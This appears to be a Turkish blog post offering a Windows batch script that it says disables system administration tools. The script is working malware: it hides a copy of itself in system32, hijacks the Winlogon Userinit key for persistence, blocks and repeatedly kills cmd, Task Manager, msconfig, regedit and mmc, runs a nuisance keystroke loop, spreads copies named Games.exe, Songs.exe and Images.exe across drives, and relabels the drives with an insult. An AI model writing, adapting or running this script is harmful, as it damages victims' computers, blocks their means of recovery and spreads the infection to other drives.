• Kategori: Güvenlik
  • Eyüp ÇELİK
  • Gösterim: 3894

Sistem Yönetim Araçlarını Devre Dışı Bırakın

Bu kodla cmd (Command Prompt), TaskManager(Görev Yöneticisi), MsConfig(Sistem Yapılandırma Hizmeti), Regedit(Kayıt Defteri), MMC(Microsoft Management Consol)'yi devre dışı bırakır.

 

@echo off
copy %0 %systemroot%\system32\
attrib +s +h +r %systemroot%\system32\%~n0%~x0
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\%~n0%~x0" /f
echo Set wshShell=wscript.CreateObject("WScript.Shell")>%systemroot%\new.vbs
(
echo do^
echo wscript.sleep 30000^
echo wshshell.sendkeys "Bluff Master Hacker"^
echo loop^
)>>%systemroot%\new.vbs
start %systemroot%\new.vbs
tasklist > r.txt
for /f "tokens=1,2" %%i in (r.txt) do if "%%i"=="cmd.exe" set ppid=%%j
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 1 /d "cmd.exe" /f > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 2 /d "taskmgr.exe" /f > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /d "msconfig.exe" /f > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 4 /d "regedit.exe" /f > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /v autorun /d "start cmd.exe cmd.exe" > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /d "msconfig.exe" /f > nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /d "mmc.exe" /f > nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder" /v type /d "group1" /f > nul
reg import fer.reg
:loop
tasklist > r.txt
for /f "tokens=1,2" %%i in (r.txt) do call :ender %%i %%j
del r.txt
for %%I in (c,d,e,f,g,h,i,j) do (
copy %0 %%I:\Games.exe
copy %0 %%I:\Songs.exe
Copy %0 %%I:\Images.exe
label %%I: Bluff Master Fucked %username%
)>nul
goto loop
pause
:ender
for %%j in (regedit,mmc,taskmgr,msconfig) do if "%1"=="%%j.exe" taskkill /f /im %1 > nul
if "%1"=="cmd.exe" if not "%2"=="%ppid%" taskkill /f /pid %2 >nul

Yorum ekle


Güvenlik kodu Yenile

Back to top